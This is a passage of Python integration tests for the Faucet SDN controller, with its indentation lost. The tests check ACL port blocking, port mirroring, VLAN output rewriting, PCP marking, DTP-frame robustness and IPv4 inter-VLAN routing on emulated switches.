untagged_host_pair = self.hosts_name_ordered()[2:]
self.verify_vlan_flood_limited(
tagged_host_pair[0], tagged_host_pair[1], untagged_host_pair[0])
self.verify_vlan_flood_limited(
untagged_host_pair[0], untagged_host_pair[1], tagged_host_pair[0])
# hosts within VLANs can ping each other
self.retry_net_ping(hosts=tagged_host_pair)
self.retry_net_ping(hosts=untagged_host_pair)
# hosts cannot ping hosts in other VLANs
self.assertEqual(
100, self.ping([tagged_host_pair[0], untagged_host_pair[0]]))
class FaucetUntaggedACLTest(FaucetUntaggedTest):
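    """Test a port ACL that blocks TCP destination port 5001 and allows 5002."""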
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedEgressACLTest(FaucetUntaggedTest):
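    """Test a VLAN egress ACL (acl_out) that blocks TCP destination port 5001 and allows 5002."""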
REQUIRES_METADATA = True
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acl_out: 1
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
self.ping_all_when_learned()
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
def test_port5002_notblocked(self):
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=egress_acl_table)
class FaucetUntaggedDPACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
dp_acls: [1]
""" + CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedNoReconfACLTest(FaucetUntaggedTest):
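    """Test that ACL flows on a port with opstatus_reconf: False persist across port down/up."""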
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
opstatus_reconf: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
matches = {
'in_port': int(self.port_map['port_1']),
'tcp_dst': 5001,
'eth_type': IPV4_ETH,
'ip_proto': 6}
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_down(self.port_map['port_1'])
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_up(self.port_map['port_1'])
self.ping_all_when_learned()
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
class FaucetUntaggedACLTcpMaskTest(FaucetUntaggedACLTest):
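    """Test ACL TCP destination port matching with a mask."""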
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
        # Match TCP destination ports with the 0x400 bit set (1024-2047, 3072-4095, ...)
tcp_dst: 1024/1024
actions:
allow: 0
- rule:
actions:
allow: 1
"""
def test_port_gt1023_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(1024, first_host, second_host, mask=1024)
self.verify_tp_dst_notblocked(1023, first_host, second_host, table_id=None)
class FaucetUntaggedVLANACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
actions:
allow: 1
vlans:
100:
description: "untagged"
acl_in: 1
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
class FaucetUntaggedOutputOnlyTest(FaucetUntaggedTest):
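    """Test that traffic received on an output_only port is dropped, while other ports are unaffected."""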
CONFIG = """
interfaces:
%(port_1)d:
output_only: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1'])},
table_id=self._VLAN_TABLE,
actions=[])
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertEqual(100.0, self.ping((first_host, second_host)))
self.assertEqual(0, self.ping((third_host, second_host)))
class FaucetUntaggedACLMirrorTest(FaucetUntaggedTest):
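    """Test that an ACL mirror action copies traffic (including EAPOL) to the mirror port."""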
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
def test_eapol_mirrored(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_eapol_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedOrderedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
- ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLMirrorDefaultAllowTest(FaucetUntaggedACLMirrorTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetMultiOutputTest(FaucetUntaggedTest):
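    """Test an ACL output action to multiple ports, including a port on a different VLAN."""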
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetMultiOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
- ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetUntaggedOutputTest(FaucetUntaggedTest):
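    """Test an ACL output action that pushes VLAN 123, rewrites the destination MAC and outputs to a port."""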
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
vlan_vid: 123
set_fields:
- eth_dst: "06:06:06:06:06:06"
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
        # We expect to see the rewritten address and VLAN.
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- vlan_vid: 123
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
        # We expect to see the rewritten address and VLAN.
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [123, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
        # We expect to see the rewritten address and VLAN.
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [123, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
        # We expect to see the rewritten address and VLAN.
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiConfVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
        # We expect to see the rewritten address and VLAN.
tcpdump_filter = 'ether proto 0x88a8'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
'vlan 456.+ethertype 802.1Q-QinQ, vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMultiConfVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
        # We expect to see the rewritten address and VLAN.
tcpdump_filter = 'ether proto 0x88a8'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
'vlan 456.+ethertype 802.1Q-QinQ, vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMirrorTest(FaucetUntaggedTest):
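    """Test adding and removing a port mirror at runtime, and that mirroring does not degrade forwarding performance."""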
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.flap_all_switch_ports()
# Add mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', self.port_map['port_1'],
restart=True, cold_start=False)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
# Remove mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', [],
restart=True, cold_start=False)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
class FaucetUntaggedMultiMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
output_only: True
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
ping_pairs = (
(first_host, second_host),
(second_host, first_host))
self.flap_all_switch_ports()
self.change_port_config(
self.port_map['port_3'], 'mirror',
[self.port_map['port_1'], self.port_map['port_2']],
restart=True, cold_start=False, hup=True)
self.verify_ping_mirrored_multi(
ping_pairs, mirror_host, both_mirrored=True)
class FaucetUntaggedMultiMirrorSepTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
mirror: %(port_1)d
%(port_4)d:
mirror: %(port_1)d
"""
def test_untagged(self):
self.flap_all_switch_ports()
        # Make sure both mirror ports receive traffic mirrored from port 1.
first_host, second_host = self.hosts_name_ordered()[0:2]
mirror_host = self.hosts_name_ordered()[2]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
mirror_host = self.hosts_name_ordered()[3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedTest(FaucetTest):
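    """Base test for tagged hosts: untagged traffic is dropped on tagged-only ports and tagged hosts can all ping."""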
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = CONFIG_TAGGED_BOILER
def setUp(self): # pylint: disable=invalid-name
super(FaucetTaggedTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=4, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_tagged(self):
        # Untagged traffic is specifically dropped.
for host in self.hosts_name_ordered():
host.cmd(self.scapy_dhcp(host.MAC(), host.intf_root_name, count=3))
for port in self.port_map.values():
self.wait_nonzero_packet_count_flow(
{'in_port': port, 'vlan_tci': '0x0000/0x1fff'}, table_id=self._VLAN_TABLE)
self.ping_all_when_learned()
class FaucetTaggedDTPTest(FaucetTaggedTest):
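    """Test that Cisco DTP trunk negotiation frames do not disrupt tagged forwarding."""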
def test_tagged(self):
for host in self.hosts_name_ordered():
scapy_txt = host.cmd(
('python3 -c \"import sys ; from scapy.contrib.dtp import * ;'
'negotiate_trunk(iface=\'%s\')\"' % host.intf_root_name))
self.assertTrue(re.search('Sent 1 packets', scapy_txt), msg=scapy_txt)
super(FaucetTaggedDTPTest, self).test_tagged()
class FaucetTaggedMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
# port 3 will mirror port 1
mirror: %(port_1)d
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.flap_all_switch_ports()
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
class FaucetTaggedVLANPCPTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedVLANPCPOrderedTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
- set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedGlobalIPv4RouteTest(FaucetTaggedTest):
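    """Test IPv4 inter-VLAN routing via a global router over many VLANs: drop rules, routing performance, L3 mesh and hairpin."""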
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
IPV = 4
NETPREFIX = 24
ETH_TYPE = IPV4_ETH
NETNS = True
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
@staticmethod
def netbase(vid, host):
return ipaddress.ip_interface('192.168.%u.%u' % (vid, host))
def fping(self, macvlan_int, ipg):
return 'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def fib_table(self):
return self._IPV4_FIB_TABLE
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv4_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["192.168.%u.254/24"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v4: True
max_wildcard_table_size: 1024
table_sizes:
vlan: %u
vip: %u
flood: %u
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(),
len(STR_VIDS) * 3, # VLAN
len(STR_VIDS) * 2, # VIP
len(STR_VIDS) * 12, # Flood
'%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
def configure_mesh(self, first_host, second_host):
hosts = (first_host, second_host)
required_ipds = set()
ipd_to_macvlan = {}
for i, host in enumerate(hosts, start=1):
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
macvlan_int = 'macvlan%u' % vid
ipa = self.netbase(vid, i)
ipg = self.netbase(vid, 254)
ipd = self.netbase(vid, 253)
required_ipds.add(str(ipd.ip))
ipd_to_macvlan[str(ipd.ip)] = (macvlan_int, host)
setup_commands.extend([
self.run_ip('link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid)),
self.run_ip('link set dev %s up' % vlan_int),
self.run_ip('link add %s link %s type macvlan mode vepa' % (macvlan_int, vlan_int)),
self.run_ip('link set dev %s up' % macvlan_int),
self.run_ip('address add %s/%u dev %s' % (ipa.ip, self.NETPREFIX, macvlan_int)),
self.run_ip('route add default via %s table %u' % (ipg.ip, vid)),
self.run_ip('rule add from %s table %u priority 100' % (ipa, vid)),
# stimulate learning attempts for down host.
self.run_ip('neigh add %s lladdr %s dev %s' % (ipd.ip, self.FAUCET_MAC, macvlan_int))])
                # Route to the other host in the same connected subnet via FAUCET,
                # so that routing (not just switching) is exercised.
for j, _ in enumerate(hosts, start=1):
if j != i:
other_ip = self.netbase(vid, j)
setup_commands.append(
self.run_ip('route add %s via %s table %u' % (other_ip, ipg.ip, vid)))
for ipa in (ipg.ip, ipd.ip):
setup_commands.append(self.fping(macvlan_int, ipa))
